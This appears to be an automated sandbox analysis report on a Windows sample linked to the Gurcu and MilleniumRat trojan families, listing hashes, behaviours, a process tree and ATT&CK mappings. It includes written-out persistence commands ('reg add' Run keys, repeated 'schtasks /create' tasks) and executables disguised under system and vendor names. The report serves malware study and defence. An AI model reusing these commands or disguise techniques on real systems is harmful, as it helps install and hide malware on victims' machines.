Analysis
max time kernel: 150s
max time network: 158s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10-11-2024 11:20
Static task: static1
Behavioral task: behavioral1 (Sample: main.exe, Resource: win7-20240903-en)
Behavioral task: behavioral2 (Sample: main.exe, Resource: win10v2004-20241007-en)
Behavioral task: behavioral3 (Sample: main.exe, Resource: win11-20241007-en)
General
Target: main.exe
Size: 5.6MB
MD5: 3d3c49dd5d13a242b436e0a065cd6837
SHA1: e38a773ffa08452c449ca5a880d89cfad24b6f1b
SHA256: e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf
SHA512: dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00
SSDEEP: 98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciY
Malware Config
Extracted family: gurcu
Signatures
Gurcu family
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
Milleniumrat family
Modifies WinLogon for persistence (2 TTPs, 5 IoCs)
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell by ChainComServermonitor.exe, five successive values each extending the previous one:
- "explorer.exe, \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\""
- "explorer.exe, \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\WmiPrvSE.exe\""
- "explorer.exe, \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\WmiPrvSE.exe\", \"C:\\Users\\All Users\\ChainComServermonitor.exe\""
- "explorer.exe, \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\WmiPrvSE.exe\", \"C:\\Users\\All Users\\ChainComServermonitor.exe\", \"C:\\Users\\All Users\\Start Menu\\unsecapp.exe\""
- "explorer.exe, \"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\WmiPrvSE.exe\", \"C:\\Users\\All Users\\ChainComServermonitor.exe\", \"C:\\Users\\All Users\\Start Menu\\unsecapp.exe\", \"C:\\Users\\Default User\\StartMenuExperienceHost.exe\""
Process spawned unexpected child process (15 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
pid_target: 3008; Process: schtasks.exe; procid_target: 89 (same for all 15 rows)
pid: 4340, 1668, 4592, 2240, 4332, 1972, 720, 2704, 3492, 2872, 1976, 2264, 2884, 4876, 4064
Downloads MZ/PE file
Checks computer location settings (2 TTPs, 5 IoCs)
Looks up the country code configured in the registry, likely a geofence check.
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation by: main.exe, Update.exe, svchost64.exe, WScript.exe, ChainComServermonitor.exe
Executes dropped EXE (4 IoCs)
- 1132 Update.exe
- 4872 svchost64.exe
- 112 ChainComServermonitor.exe
- 2272 WmiPrvSE.exe
Loads dropped DLL (2 IoCs)
- 5024 main.exe
- 1132 Update.exe
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application (2 TTPs, 11 IoCs)
Set value (str), by ChainComServermonitor.exe unless noted otherwise:
- \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Users\\All Users\\Start Menu\\unsecapp.exe\""
- \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Users\\Default User\\StartMenuExperienceHost.exe\""
- \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\""
- \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Default User\\WmiPrvSE.exe\""
- \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChainComServermonitor = "\"C:\\Users\\All Users\\ChainComServermonitor.exe\""
- \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChainComServermonitor = "\"C:\\Users\\All Users\\ChainComServermonitor.exe\""
- \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Users\\All Users\\Start Menu\\unsecapp.exe\""
- \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Users\\Default User\\StartMenuExperienceHost.exe\""
- \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" (reg.exe)
- \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\logs\\OfficeClickToRun.exe\""
- \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Default User\\WmiPrvSE.exe\""
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
- flow 12: raw.githubusercontent.com
- flow 14: raw.githubusercontent.com
- flow 21: raw.githubusercontent.com
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 4: ip-api.com
Drops file in System32 directory (2 IoCs)
- File created \??\c:\Windows\System32\CSCC6E35351371843E4BA329C19D175557C.TMP (csc.exe)
- File created \??\c:\Windows\System32\lhkpi-.exe (csc.exe)
Enumerates processes with tasklist (1 TTP, 1 IoC)
- 4508 tasklist.exe
Drops file in Program Files directory (3 IoCs)
- File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe (ChainComServermonitor.exe)
- File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe (ChainComServermonitor.exe)
- File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\e6c9b481da804f (ChainComServermonitor.exe)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by: svchost64.exe, WScript.exe, cmd.exe
System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 1 IoC)
Adversaries may check for Internet connectivity on compromised systems.
- 4744 PING.EXE
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
- Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 (Update.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier (Update.exe)
Delays execution with timeout.exe (1 IoC)
- 3308 timeout.exe
Modifies registry class (2 IoCs)
- Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings (svchost64.exe)
- Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings (ChainComServermonitor.exe)
Modifies registry key (1 TTP, 1 IoC)
- 4588 reg.exe
Runs ping.exe (1 TTP, 1 IoC)
- 4744 PING.EXE
Scheduled Task/Job: Scheduled Task (1 TTP, 15 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
schtasks.exe pids: 1668, 2240, 4876, 4340, 4332, 2704, 1972, 2264, 2872, 1976, 2884, 4064, 4592, 720, 3492
Suspicious behavior: EnumeratesProcesses (64 IoCs)
- 5024 main.exe (repeated entries)
- 1132 Update.exe (repeated entries)
Suspicious use of AdjustPrivilegeToken (5 IoCs)
- Token: SeDebugPrivilege, 5024 main.exe
- Token: SeDebugPrivilege, 4508 tasklist.exe
- Token: SeDebugPrivilege, 1132 Update.exe
- Token: SeDebugPrivilege, 112 ChainComServermonitor.exe
- Token: SeDebugPrivilege, 2272 WmiPrvSE.exe
Suspicious use of SetWindowsHookEx (1 IoC)
- 1132 Update.exe
Suspicious use of WriteProcessMemory (41 IoCs)
Each row is "pid Process wrote to memory of target pid (procid_target)"; the count marks how often the row is repeated in the report:
- PID 5024 main.exe wrote to memory of 4532 (90), x2
- PID 4532 cmd.exe wrote to memory of 4508 (92), x2
- PID 4532 cmd.exe wrote to memory of 4904 (93), x2
- PID 4532 cmd.exe wrote to memory of 3308 (94), x2
- PID 4532 cmd.exe wrote to memory of 1132 (95), x2
- PID 1132 Update.exe wrote to memory of 748 (99), x2
- PID 748 cmd.exe wrote to memory of 4588 (101), x2
- PID 1132 Update.exe wrote to memory of 4872 (104), x3
- PID 4872 svchost64.exe wrote to memory of 2112 (105), x3
- PID 2112 WScript.exe wrote to memory of 2792 (106), x3
- PID 2792 cmd.exe wrote to memory of 112 (108), x2
- PID 112 ChainComServermonitor.exe wrote to memory of 920 (112), x2
- PID 920 csc.exe wrote to memory of 4668 (114), x2
- PID 112 ChainComServermonitor.exe wrote to memory of 208 (115), x2
- PID 208 csc.exe wrote to memory of 3580 (117), x2
- PID 112 ChainComServermonitor.exe wrote to memory of 3708 (130), x2
- PID 3708 cmd.exe wrote to memory of 4364 (132), x2
- PID 3708 cmd.exe wrote to memory of 4744 (133), x2
- PID 3708 cmd.exe wrote to memory of 2272 (134), x2
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Process tree; the number in brackets is the depth in the tree, indentation follows the parent/child relationship.

[1] C:\Users\Admin\AppData\Local\Temp\main.exe
    command: "C:\Users\Admin\AppData\Local\Temp\main.exe"
    PID: 5024
    - Checks computer location settings
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\cmd.exe
      command: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9CAD.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9CAD.tmp.bat
      PID: 4532
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\tasklist.exe
        command: Tasklist /fi "PID eq 5024"
        PID: 4508
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\find.exe
        command: find ":"
        PID: 4904
    [3] C:\Windows\system32\timeout.exe
        command: Timeout /T 1 /Nobreak
        PID: 3308
        - Delays execution with timeout.exe
    [3] C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        command: "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
        PID: 1132
        - Checks computer location settings
        - Executes dropped EXE
        - Loads dropped DLL
        - Checks processor information in registry
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          command: "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
          PID: 748
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\reg.exe
            command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
            PID: 4588
            - Adds Run key to start application
            - Modifies registry key
      [4] C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe
          command: "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe"
          PID: 4872
          - Checks computer location settings
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Modifies registry class
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WScript.exe
            command: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
            PID: 2112
            - Checks computer location settings
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\cmd.exe
              command: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
              PID: 2792
              - System Location Discovery: System Language Discovery
              - Suspicious use of WriteProcessMemory
            [7] C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                command: "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                PID: 112
                - Modifies WinLogon for persistence
                - Checks computer location settings
                - Executes dropped EXE
                - Adds Run key to start application
                - Drops file in Program Files directory
                - Modifies registry class
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory
              [8] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3andil0x\3andil0x.cmdline"
                  PID: 920
                  - Suspicious use of WriteProcessMemory
                [9] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4C2.tmp" "c:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\CSC68367FA5CB754BA4808BA555E24575FB.TMP"
                    PID: 4668
              [8] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lwxvmawv\lwxvmawv.cmdline"
                  PID: 208
                  - Drops file in System32 directory
                  - Suspicious use of WriteProcessMemory
                [9] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC54F.tmp" "c:\Windows\System32\CSCC6E35351371843E4BA329C19D175557C.TMP"
                    PID: 3580
              [8] C:\Windows\System32\cmd.exe
                  command: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\K6ODNwx9aX.bat"
                  PID: 3708
                  - Suspicious use of WriteProcessMemory
                [9] C:\Windows\system32\chcp.com
                    command: chcp 65001
                    PID: 4364
                [9] C:\Windows\system32\PING.EXE
                    command: ping -n 10 localhost
                    PID: 4744
                    - System Network Configuration Discovery: Internet Connection Discovery
                    - Runs ping.exe
                [9] C:\Users\Default User\WmiPrvSE.exe
                    command: "C:\Users\Default User\WmiPrvSE.exe"
                    PID: 2272
                    - Executes dropped EXE
                    - Suspicious use of AdjustPrivilegeToken

The following fifteen schtasks.exe processes appear at depth 1 (see "Process spawned unexpected child process" above); each is flagged with "Process spawned unexpected child process" and "Scheduled Task/Job: Scheduled Task".

[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /f
    PID: 1668
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /rl HIGHEST /f
    PID: 4340
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /rl HIGHEST /f
    PID: 4592
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /f
    PID: 2240
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f
    PID: 4332
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f
    PID: 1972
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "ChainComServermonitorC" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\ChainComServermonitor.exe'" /f
    PID: 720
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "ChainComServermonitor" /sc ONLOGON /tr "'C:\Users\All Users\ChainComServermonitor.exe'" /rl HIGHEST /f
    PID: 2704
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "ChainComServermonitorC" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\ChainComServermonitor.exe'" /rl HIGHEST /f
    PID: 3492
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Start Menu\unsecapp.exe'" /f
    PID: 2872
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\unsecapp.exe'" /rl HIGHEST /f
    PID: 1976
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Start Menu\unsecapp.exe'" /rl HIGHEST /f
    PID: 2264
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /f
    PID: 2884
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    PID: 4876
[1] C:\Windows\system32\schtasks.exe
    command: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    PID: 4064
Network
MITRE ATT&CK Enterprise v15 (count of matching signatures in parentheses)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Discovery
- Browser Information Discovery (1)
- Process Discovery (1)
- Query Registry (3)
- Remote System Discovery (1)
- System Information Discovery (3)
- System Location Discovery (1)
  - System Language Discovery (1)
- System Network Configuration Discovery (1)
  - Internet Connection Discovery (1)
Downloads